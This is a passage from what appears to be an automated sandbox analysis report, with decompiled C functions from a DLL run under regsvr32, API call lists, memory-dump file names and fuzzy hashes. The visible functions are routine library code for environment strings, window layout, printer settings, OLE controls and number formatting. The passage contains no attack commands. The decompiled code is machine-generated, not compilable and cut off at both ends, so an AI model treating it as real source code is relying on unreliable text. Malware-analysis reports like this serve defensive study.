					_t36 = GetEnvironmentStringsW();
					if(_t36 == _t29) {
						goto L20;
					}
					goto L9;
				}
				_t36 = GetEnvironmentStringsW();
				if(_t36 == 0) {
					_t28 = GetLastError();
					__eflags = _t28 - 0x78;
					if(_t28 != 0x78) {
						_t7 =  *0x1004f700; // 0x1
					} else {
						_t7 = _t38;
						 *0x1004f700 = _t7;
					}
					goto L6;
				} else {
					 *0x1004f700 = 1;
					goto L7;
				}
			}

0x1001666d
0x1001667c
0x1001667e
0x10016684
0x10016685
0x100166b4
0x100166b4
0x100166b7
0x10016736
0x10016738
0x10016742
0x10016742
0x10016748
0x1001674a
0x1001674c
0x1001673e
0x00000000
0x1001673e
0x1001674e
0x10016750
0x1001675c
0x1001675f
0x10016767
0x10016769
0x1001676c
0x10016775
0x1001676e
0x1001676e
0x1001676e
0x1001677e
0x00000000
0x00000000
0x00000000
0x00000000
0x10016752
0x10016752
0x10016752
0x10016752
0x10016753
0x10016753
0x10016757
0x10016758
0x10016758
0x00000000
0x10016752
0x1001673a
0x1001673c
0x00000000
0x00000000
0x00000000
0x1001673c
0x100166b9
0x100166bb
0x100166c5
0x100166c8
0x100166ca
0x100166da
0x100166e8
0x100166ed
0x100166f3
0x100166f7
0x100166fa
0x10016702
0x10016706
0x10016713
0x10016715
0x10016717
0x10016719
0x1001671d
0x10016723
0x10016723
0x10016727
0x10016727
0x10016706
0x1001672c
0x00000000
0x00000000
0x00000000
0x00000000
0x100166cc
0x100166cc
0x100166cc
0x100166cc
0x100166ce
0x100166d3
0x100166d5
0x00000000
0x100166cc
0x100166bf
0x100166c3
0x00000000
0x00000000
0x00000000
0x100166c3
0x10016689
0x1001668d
0x1001669b
0x100166a1
0x100166a4
0x100166af
0x100166a6
0x100166a6
0x100166a8
0x100166a8
0x00000000
0x1001668f
0x1001668f
0x00000000
0x1001668f

APIs

GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016687
GetLastError.KERNEL32(?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001669B
GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100166BD
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,10011248), ref: 100166F1
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,10011248,?,?), ref: 10016713
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001672C
GetEnvironmentStrings.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016742
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 1001677E

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
String ID:
API String ID: 883850110-0
Opcode ID: bfeabb1aff3bc99bbfe24a1f77970b714d91aefed0498c732c899eb5009dd72e
Instruction ID: 9752ab07c098c977bc575d501e7eaa0deb9efe59c3b15e47417eb48d6ecdcefd
Opcode Fuzzy Hash: bfeabb1aff3bc99bbfe24a1f77970b714d91aefed0498c732c899eb5009dd72e
Instruction Fuzzy Hash: 7831A5B260D26A6FE311EF654CC882BBADCEB4E1D8712092DF681CB191D671DCC496A1

Uniqueness

Uniqueness Score: -1.00%

Function 10022499 Relevance: 12.1, APIs: 8, Instructions: 124
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10022499(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17, struct tagRECT* _a20, signed int _a24, intOrPtr _a28) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagRECT _v36;
				void* _v40;
				void* __ebp;
				signed int _t61;
				int _t62;
				signed short _t63;
				void* _t64;
				void* _t72;
				intOrPtr* _t85;
				signed int _t87;
				struct HWND__* _t91;
				void* _t92;

				_t72 = __ecx;
				_v8 = 0;
				_v12 = _a28;
				_v16 = 0;
				_v20 = 0;
				if(_a24 == 0) {
					GetClientRect( *(__ecx + 0x1c),  &_v36);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				_t61 = _a16 & 0xffff7fff;
				_a24 = _t61;
				if(_t61 == 1) {
					_v40 = _v40 & 0x00000000;
				} else {
					_v40 = BeginDeferWindowPos(8);
				}
				_t62 = GetTopWindow( *(_t72 + 0x1c));
				while(1) {
					_t91 = _t62;
					if(_t91 == 0) {
						break;
					}
					_t63 = GetDlgCtrlID(_t91);
					_push(_t91);
					_t87 = _t63 & 0x0000ffff;
					_t64 = E10022115();
					if(_t87 != _a12) {
						if(_t87 >= _a4 && _t87 <= _a8 && _t64 != 0) {
							SendMessageA(_t91, 0x361, 0,  &_v40);
						}
					} else {
						_v8 = _t91;
					}
					_t62 = GetWindow(_t91, 2);
				}
				if(_a24 != 1) {
					if(_a12 != 0 && _v8 != 0) {
						_t62 = E100220EE(_t92, _v8);
						if(_a24 == 2) {
							_t85 = _a20;
							_v36.left = _v36.left +  *_t85;
							_v36.top = _v36.top +  *((intOrPtr*)(_t85 + 4));
							_v36.right = _v36.right -  *((intOrPtr*)(_t85 + 8));
							_v36.bottom = _v36.bottom -  *((intOrPtr*)(_t85 + 0xc));
						}
						if((_a17 & 0x00000080) == 0) {
							 *((intOrPtr*)( *_t62 + 0x68))( &_v36, 0);
							_t62 = E10020D81( &_v40, _v8,  &_v36);
						}
					}
					if(_v40 != 0) {
						_t62 = EndDeferWindowPos(_v40);
					}
				} else {
					if(_a28 == 0) {
						_t62 = _a20;
						 *((intOrPtr*)(_t62 + 8)) = _v20;
						 *((intOrPtr*)(_t62 + 4)) = 0;
						 *_t62 = 0;
						 *((intOrPtr*)(_t62 + 0xc)) = _v16;
					} else {
						_t62 = CopyRect(_a20,  &_v36);
					}
				}
				return _t62;
			}

0x100224a8
0x100224ae
0x100224b1
0x100224b4
0x100224b7
0x100224ba
0x100224cc
0x100224bc
0x100224bf
0x100224c0
0x100224c1
0x100224c2
0x100224c2
0x100224d5
0x100224dd
0x100224e0
0x100224ef
0x100224e2
0x100224ea
0x100224ea
0x100224f6
0x10022542
0x10022542
0x10022546
0x00000000
0x00000000
0x10022501
0x10022507
0x10022508
0x1002250b
0x10022513
0x1002251d
0x10022533
0x10022533
0x10022515
0x10022515
0x10022515
0x1002253c
0x1002253c
0x1002254c
0x1002257b
0x10022585
0x1002258e
0x10022590
0x10022595
0x1002259b
0x100225a1
0x100225a7
0x100225a7
0x100225ae
0x100225b9
0x100225c7
0x100225c7
0x100225ae
0x100225cf
0x100225d4
0x100225d4
0x1002254e
0x10022551
0x10022562
0x10022568
0x1002256e
0x10022571
0x10022573
0x10022553
0x1002255a
0x1002255a
0x10022551
0x100225de

APIs

GetClientRect.USER32 ref: 100224CC
BeginDeferWindowPos.USER32(00000008), ref: 100224E4
GetTopWindow.USER32(?), ref: 100224F6
GetDlgCtrlID.USER32 ref: 10022501
SendMessageA.USER32 ref: 10022533
GetWindow.USER32(00000000,00000002), ref: 1002253C
CopyRect.USER32 ref: 1002255A
EndDeferWindowPos.USER32(00000000), ref: 100225D4

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
String ID:
API String ID: 1228040700-0
Opcode ID: 42fbaed3706ff63598f5f0fcd2255645fe957362c4a3063a48a191e489ec859f
Instruction ID: a778dc46a9958f4d0915ef63e23ed223fa2105f0a807d6ecff0719afcf2b0a04
Opcode Fuzzy Hash: 42fbaed3706ff63598f5f0fcd2255645fe957362c4a3063a48a191e489ec859f
Instruction Fuzzy Hash: D741477190062AEFCF11DFD4E8A49EEB7B5FF08340B51816AF905A7251C734AA50CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002535C Relevance: 12.1, APIs: 8, Instructions: 81
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002535C(void* __ebx, void* __edi, void* __esi, char* _a4, CHAR* _a8) {
				intOrPtr _v8;
				short _v528;
				short _v1048;
				short _v1568;
				intOrPtr _t18;
				int _t20;
				int _t21;
				void* _t23;
				char* _t32;
				int _t37;
				char* _t42;
				void* _t47;
				void* _t49;

				_t18 =  *0x1004c470; // 0xf256d946
				_t42 = _a4;
				_v8 = _t18;
				if(lstrcmpiA(_t42, _a8) == 0) {
					_t20 = GetSystemMetrics(0x2a);
					if(_t20 != 0) {
						_t21 = lstrlenA(_t42);
						if(_t21 != lstrlenA(_a8)) {
							L13:
							_t23 = 0;
						} else {
							_t37 = GetThreadLocale();
							GetStringTypeA(_t37, 1, _t42, 0xffffffff,  &_v528);
							GetStringTypeA(_t37, 4, _t42, 0xffffffff,  &_v1048);
							GetStringTypeA(_t37, 1, _a8, 0xffffffff,  &_v1568);
							_t32 = _t42;
							if( *_t42 == 0) {
								L10:
								_t23 = 1;
							} else {
								_t47 = 0;
								while(( *(_t49 + _t47 - 0x414) & 0x00000080) == 0 ||  *((intOrPtr*)(_t49 + _t47 - 0x20c)) ==  *((intOrPtr*)(_t49 + _t47 - 0x61c))) {
									_t47 = _t47 + 2;
									if( *_t32 != 0) {
										continue;
									} else {
										goto L10;
									}
									goto L11;
								}
								goto L13;
							}
						}
						L11:
					} else {
						_t23 = _t20 + 1;
					}
				} else {
					_t23 = 0;
				}
				return E100117AE(_t23, _v8);
			}

0x10025365
0x1002536e
0x10025372
0x1002537d
0x10025388
0x10025390
0x100253a1
0x100253ac
0x10025434
0x10025434
0x100253b2
0x100253be
0x100253cd
0x100253dc
0x100253ed
0x100253f2
0x100253f4
0x10025422
0x10025424
0x100253f6
0x100253f6
0x100253f8
0x10025416
0x10025420
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10025420
0x00000000
0x100253f8
0x100253f4
0x10025425
0x10025392
0x10025392
0x10025392
0x1002537f
0x1002537f
0x1002537f
0x10025431

APIs

lstrcmpiA.KERNEL32(?,00000000), ref: 10025375
GetSystemMetrics.USER32 ref: 10025388

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MetricsSystemlstrcmpi
String ID:
API String ID: 2335526769-0
Opcode ID: 1cbe2259d2c1a5909c7395cdd660f50db29ee15dbb1b64e3fa85e708783875df
Instruction ID: 2e24e30c7814501e8ef39cdb76116c26bdbe99ae311f6264528fd307033058d9
Opcode Fuzzy Hash: 1cbe2259d2c1a5909c7395cdd660f50db29ee15dbb1b64e3fa85e708783875df
Instruction Fuzzy Hash: BD21677150022D7ADB01EBB09C44FDEBBACEB453B2FA08661FC12D61C1D6718E818B64

Uniqueness

Uniqueness Score: -1.00%

Function 1001F60C Relevance: 12.1, APIs: 8, Instructions: 65
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1001F60C(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x70);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x6c);
							if( *(_t35 + 0x6c) != 0) {
								E10029C1B(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x6c) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E10029C1B( *(_t35 + 0x6c));
								 *(_t35 + 0x6c) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

0x1001f60f
0x1001f611
0x1001f613
0x1001f61b
0x1001f635
0x1001f63d
0x1001f647
0x1001f64e
0x1001f650
0x1001f655
0x1001f658
0x1001f658
0x1001f66f
0x1001f676
0x1001f68e
0x1001f693
0x1001f698
0x1001f698
0x1001f69e
0x1001f69e
0x1001f64e
0x1001f6a3
0x1001f6a7

APIs

GlobalLock.KERNEL32 ref: 1001F629
lstrcmpA.KERNEL32(?,?), ref: 1001F635
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1001F647
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1001F667
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1001F66F
GlobalLock.KERNEL32 ref: 1001F679
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 1001F686
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 1001F69E

Part of subcall function 10029C1B: GlobalFlags.KERNEL32(?), ref: 10029C25
Part of subcall function 10029C1B: GlobalUnlock.KERNEL32(?,00000000,?,1001F698,?,00000000,?,?,00000000,00000000,00000002), ref: 10029C36
Part of subcall function 10029C1B: GlobalFree.KERNEL32 ref: 10029C41

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: c3571f4809fef0992d903921779ddd8b1d2f29fd1f502d0743ce459bc184c30f
Instruction ID: 2a491371b327142203fc8723eb74c2771e75d1908c59da801caef355c7fd3301
Opcode Fuzzy Hash: c3571f4809fef0992d903921779ddd8b1d2f29fd1f502d0743ce459bc184c30f
Instruction Fuzzy Hash: 61118E76500208BEDB12DBAACC86D7F7AFDEF85784B50081DF645EA122D671ED80DB24

Uniqueness

Uniqueness Score: -1.00%

Function 100074F2 Relevance: 10.7, APIs: 7, Instructions: 247
memoryCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E100074F2(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t132;
				int* _t133;
				int _t138;
				intOrPtr* _t139;
				int _t142;
				int* _t143;
				int _t146;
				int _t171;
				intOrPtr _t172;
				int _t173;
				intOrPtr _t178;
				int _t183;
				int _t186;
				void* _t187;
				int* _t191;
				void* _t213;
				int* _t216;
				short _t217;
				intOrPtr* _t225;
				void* _t227;
				struct tagRECT _t228;
				int* _t229;
				signed int _t233;
				int* _t235;
				int* _t237;
				int* _t238;
				void* _t239;

				_t227 = __esi;
				E10011BF0(0x1003a548, _t239);
				_t132 =  *0x1004c470; // 0xf256d946
				_t225 =  *((intOrPtr*)(_t239 + 0x14));
				 *((intOrPtr*)(_t239 - 0x10)) = _t132;
				_t183 = 0;
				_t133 = _t225 + 0x12;
				 *(_t239 - 0x34) = _t133;
				if( *(_t239 + 0x10) != 0) {
					 *((intOrPtr*)(_t239 - 0x58)) =  *((intOrPtr*)(_t225 + 8));
					 *((intOrPtr*)(_t239 - 0x54)) =  *((intOrPtr*)(_t225 + 4));
					 *((short*)(_t239 - 0x50)) =  *((intOrPtr*)(_t225 + 0xc));
					 *((short*)(_t239 - 0x4e)) =  *((intOrPtr*)(_t225 + 0xe));
					 *((short*)(_t239 - 0x4a)) =  *_t133;
					_t216 = _t225 + 0x18;
					 *((short*)(_t239 - 0x4c)) =  *(_t225 + 0x10);
					 *((short*)(_t239 - 0x48)) =  *((intOrPtr*)(_t225 + 0x14));
					_t225 = _t239 - 0x58;
					 *(_t239 - 0x34) = _t216;
				}
				_t217 =  *((short*)(_t225 + 0xa));
				_push(_t227);
				_t228 =  *((short*)(_t225 + 8));
				 *((intOrPtr*)(_t239 - 0x5c)) =  *((short*)(_t225 + 0xe)) + _t217;
				 *(_t239 - 0x68) = _t228;
				 *((intOrPtr*)(_t239 - 0x64)) = _t217;
				 *((intOrPtr*)(_t239 - 0x60)) =  *((short*)(_t225 + 0xc)) + _t228;
				_t138 = MapDialogRect( *( *((intOrPtr*)(_t239 + 8)) + 0x1c), _t239 - 0x68);
				_t229 =  *(_t239 + 0x1c);
				 *(_t239 - 0x28) = _t183;
				if( *((intOrPtr*)(_t239 + 0x20)) >= 4) {
					_t186 =  *_t229;
					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - 4;
					_t229 =  &(_t229[1]);
					if(_t186 > 0) {
						__imp__#4(_t229, _t186);
						_t187 = _t186 + _t186;
						_t229 = _t229 + _t187;
						 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t187;
						 *(_t239 - 0x28) = _t138;
					}
					_t183 = 0;
				}
				 *(_t239 - 0x2c) = _t183;
				_t139 = E100243B2();
				_t218 =  *_t139;
				 *((intOrPtr*)(_t239 + 0x14)) =  *((intOrPtr*)( *_t139 + 0xc))() + 0x10;
				 *(_t239 - 4) = _t183;
				 *(_t239 - 0x38) = _t183;
				 *(_t239 - 0x3c) = _t183;
				 *(_t239 - 0x30) = _t183;
				if( *((short*)(_t239 + 0x18)) == 0x37a ||  *((short*)(_t239 + 0x18)) == 0x37b) {
					_t142 =  *_t229;
					_t49 = _t142 - 0xc; // -28
					_t191 = _t49;
					_t229 =  &(_t229[3]);
					 *(_t239 - 0x40) = _t142;
					 *(_t239 + 0x1c) = _t191;
					if(_t191 > _t183) {
						do {
							_t171 =  *_t229;
							 *(_t239 + 0x1c) =  *(_t239 + 0x1c) - 6;
							_t235 =  &(_t229[1]);
							_t229 =  &(_t235[0]);
							 *(_t239 - 0x44) = _t171;
							 *(_t239 + 0x10) =  *_t235;
							if(_t171 != 0x80010001) {
								_t172 = E1001F77E(0x1c);
								 *((intOrPtr*)(_t239 - 0x6c)) = _t172;
								__eflags = _t172 - _t183;
								 *(_t239 - 4) = 1;
								if(_t172 == _t183) {
									_t173 = 0;
									__eflags = 0;
								} else {
									_t173 = E1000B256(_t172,  *(_t239 - 0x2c),  *(_t239 - 0x44),  *(_t239 + 0x10));
								}
								 *(_t239 - 4) = 0;
								 *(_t239 - 0x2c) = _t173;
							} else {
								_t237 =  &(_t229[1]);
								 *(_t239 - 0x3c) =  *_t229;
								_t238 =  &(_t237[3]);
								 *(_t239 - 0x30) =  *_t237;
								E10006AEC(_t239 + 0x14, _t238);
								_t178 =  *((intOrPtr*)( *((intOrPtr*)(_t239 + 0x14)) - 0xc));
								_t213 = 0xffffffef;
								 *(_t239 + 0x1c) =  *(_t239 + 0x1c) + _t213 - _t178;
								_t229 = _t238 + _t178 + 1;
								 *(_t239 - 0x38) =  *(_t239 + 0x10);
							}
						} while ( *(_t239 + 0x1c) > _t183);
						_t142 =  *(_t239 - 0x40);
					}
					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t142;
					 *((intOrPtr*)(_t239 + 0x18)) =  *((intOrPtr*)(_t239 + 0x18)) + 0xfffc;
				}
				_t143 =  *(_t239 - 0x34);
				_t256 =  *_t143 - 0x7b;
				_push(_t239 - 0x20);
				_push(_t143);
				if( *_t143 != 0x7b) {
					__imp__CLSIDFromProgID();
				} else {
					__imp__CLSIDFromString();
				}
				_push(_t183);
				_push( *((intOrPtr*)(_t239 + 0x20)));
				_push(_t229);
				 *(_t239 + 0x1c) = _t143;
				E1002EC6C(_t239 - 0x94, _t256);
				 *(_t239 - 4) = 2;
				 *(_t239 - 0x24) = _t183;
				asm("sbb esi, esi");
				_t233 =  ~( *((intOrPtr*)(_t239 + 0x18)) - 0x378) & _t239 - 0x00000094;
				if( *(_t239 + 0x1c) >= _t183 && E100090DE( *((intOrPtr*)(_t239 + 8))) != 0 && E10009A9F( *((intOrPtr*)( *((intOrPtr*)(_t239 + 8)) + 0x48)), _t183, _t239 - 0x20, _t183,  *_t225, _t239 - 0x68,  *(_t225 + 0x10) & 0x0000ffff, _t233, 0 |  *((short*)(_t239 + 0x18)) == 0x00000377,  *(_t239 - 0x28), _t239 - 0x24) != 0) {
					E1000A762( *(_t239 - 0x24), 1);
					SetWindowPos( *( *(_t239 - 0x24) + 0x20),  *(_t239 + 0xc), _t183, _t183, _t183, _t183, 0x13);
					 *( *(_t239 - 0x24) + 0x90) =  *(_t239 - 0x2c);
					E100074A5(_t183,  *(_t239 - 0x24) + 0xa0, _t239, _t239 + 0x14);
					 *((short*)( *(_t239 - 0x24) + 0x94)) =  *(_t239 - 0x38);
					 *( *(_t239 - 0x24) + 0x98) =  *(_t239 - 0x3c);
					 *( *(_t239 - 0x24) + 0x9c) =  *(_t239 - 0x30);
				}
				if( *(_t239 - 0x28) != _t183) {
					__imp__#6( *(_t239 - 0x28));
				}
				_t146 =  *(_t239 - 0x24);
				if(_t146 == _t183) {
					 *( *(_t239 + 0x24)) = _t183;
				} else {
					 *( *(_t239 + 0x24)) =  *(_t146 + 0x20);
					_t183 = 1;
				}
				 *(_t239 - 4) = 0;
				E1002EFD7(_t183, _t239 - 0x94, _t218);
				E100014B0( *((intOrPtr*)(_t239 + 0x14)) + 0xfffffff0, _t218);
				 *[fs:0x0] =  *((intOrPtr*)(_t239 - 0xc));
				return E100117AE(_t183,  *((intOrPtr*)(_t239 - 0x10)));
			}

0x100074f2
0x100074f7
0x10007502
0x10007509
0x1000750c
0x1000750f
0x10007514
0x10007517
0x1000751a
0x10007522
0x10007528
0x1000752f
0x10007539
0x10007541
0x10007549
0x1000754c
0x10007550
0x10007554
0x10007557
0x10007557
0x1000755a
0x10007568
0x10007569
0x1000756d
0x1000757c
0x1000757f
0x10007582
0x10007585
0x1000758f
0x10007592
0x10007595
0x10007597
0x10007599
0x1000759d
0x100075a2
0x100075a6
0x100075ac
0x100075ae
0x100075b0
0x100075b3
0x100075b3
0x100075b6
0x100075b6
0x100075b8
0x100075bb
0x100075c0
0x100075ca
0x100075d3
0x100075d6
0x100075d9
0x100075dc
0x100075df
0x100075ed
0x100075ef
0x100075ef
0x100075f2
0x100075f7
0x100075fa
0x100075fd
0x10007603
0x10007603
0x10007605
0x10007609
0x10007610
0x10007616
0x10007619
0x1000761d
0x10007654
0x1000765a
0x1000765d
0x1000765f
0x10007663
0x10007677
0x10007677
0x10007665
0x10007670
0x10007670
0x10007679
0x1000767d
0x1000761f
0x10007621
0x10007624
0x10007629
0x10007630
0x10007633
0x1000763b
0x10007640
0x10007643
0x10007646
0x1000764d
0x1000764d
0x10007680
0x10007689
0x10007689
0x1000768c
0x1000768f
0x1000768f
0x10007696
0x10007699
0x100076a0
0x100076a1
0x100076a2
0x100076ac
0x100076a4
0x100076a4
0x100076a4
0x100076b2
0x100076b3
0x100076bc
0x100076bd
0x100076c0
0x100076d7
0x100076db
0x100076de
0x100076e0
0x100076e5
0x10007734
0x10007748
0x10007754
0x10007767
0x10007773
0x10007780
0x1000778c
0x1000778c
0x10007796
0x1000779b
0x1000779b
0x100077a1
0x100077a6
0x100077b8
0x100077a8
0x100077b0
0x100077b2
0x100077b2
0x100077c0
0x100077c4
0x100077cf
0x100077d8
0x100077eb

APIs

__EH_prolog.LIBCMT ref: 100074F7
MapDialogRect.USER32(?,?), ref: 10007585
SysAllocStringLen.OLEAUT32(?,00000000), ref: 100075A6
CLSIDFromString.OLE32(?,00000004), ref: 100076A4
CLSIDFromProgID.OLE32(?,00000004), ref: 100076AC
SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,00000004,00000000,?,?,?,0000FC84,00000000), ref: 10007748
SysFreeString.OLEAUT32(?), ref: 1000779B

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: String$From$AllocDialogFreeH_prologProgRectWindow
String ID:
API String ID: 493809305-0
Opcode ID: 49f95f9342accb2b989199e6a3fe790c04b9925ae12edf67e65d2fb5adebfaa9
Instruction ID: 430f13df2ed8550076e5f7c2e9f31eb497c55eb67174fe5e7936e43fbe5827de
Opcode Fuzzy Hash: 49f95f9342accb2b989199e6a3fe790c04b9925ae12edf67e65d2fb5adebfaa9
Instruction Fuzzy Hash: F5A12475D00619DFDB04CFA8C884AEDBBF4FF08344F118529E819AB251E735AE90CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001BC3A Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 228
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E1001BC3A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed short* _a24) {
				intOrPtr _v8;
				char _v9;
				signed int _v10;
				signed int _v14;
				signed int _v18;
				signed short _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v44;
				signed int _v48;
				signed short* _v52;
				intOrPtr _t87;
				signed int _t88;
				signed short* _t99;
				intOrPtr* _t100;
				signed int _t101;
				signed short _t103;
				signed int _t105;
				signed short* _t131;
				signed int _t133;
				signed int _t139;
				signed short* _t141;
				signed short _t149;
				signed int _t151;
				signed int _t152;
				signed int _t159;
				signed int _t161;
				signed int _t164;
				void* _t165;
				void* _t166;

				_t87 =  *0x1004c470; // 0xf256d946
				_v8 = _t87;
				_t88 = _a12;
				_t131 = _a24;
				_t133 = _t88 & 0x00008000;
				_v32 = 0xcc;
				_v31 = 0xcc;
				_v30 = 0xcc;
				_v29 = 0xcc;
				_v28 = 0xcc;
				_v27 = 0xcc;
				_v26 = 0xcc;
				_v25 = 0xcc;
				_v24 = 0xcc;
				_v23 = 0xcc;
				_v22 = 0xfb;
				_v21 = 0x3f;
				_v48 = 1;
				_t149 = _t88 & 0x00007fff;
				if(_t133 == 0) {
					_t131[1] = 0x20;
				} else {
					_t131[1] = 0x2d;
				}
				_t151 = _a8;
				if(_t149 != 0 || _t151 != 0 || _a4 != _t151) {
					if(_t149 != 0x7fff) {
						_t90 = _t149 & 0x0000ffff;
						_v20 = _v20 & 0x00000000;
						_v18 = _a4;
						_t159 = (((_t149 & 0x0000ffff) >> 8) + (_t151 >> 0x18) * 2) * 0x4d + _t90 * 0x4d10 - 0x134312f4 >> 0x10;
						_v10 = _t149;
						_v14 = _t151;
						E1001C383(_t131, _t151, _t159,  &_v20,  ~_t159, 1);
						_t166 = _t165 + 0xc;
						__eflags = _v10 - 0x3fff;
